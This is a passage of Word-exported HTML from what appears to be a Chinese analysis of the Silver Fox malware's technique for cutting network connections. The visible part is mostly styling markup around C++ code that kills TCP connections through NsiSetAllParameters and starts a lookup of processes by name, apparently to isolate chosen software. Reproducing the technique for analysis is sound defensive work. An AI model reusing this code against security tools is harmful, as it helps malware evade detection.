&#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">remoteAddrFamily </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> AF_INET</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">remotePort </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">WORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pTcpRow</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwRemotePort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">remoteAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pTcpRow</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwRemoteAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Issue command to kill the TCP connection</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD result </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> MyNsiSetAllParameters</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">1,</span><span style="mso-spacerun:yes;"><span leaf="">                              </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Unknown / static</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">2,</span><span style="mso-spacerun:yes;"><span leaf="">                              </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Action code</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">LPVOID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NPI_MS_TCP_MODULEID,</span><span style="mso-spacerun:yes;"><span leaf="">   </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// TCP module identifier</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">16,</span><span style="mso-spacerun:yes;"><span leaf="">                             </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// IO code (guessed)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">params, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">sizeof</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">),</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">       </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Input buffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                     </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Output buffer (unused)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> result</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> GetPidsByProcessName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">const</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 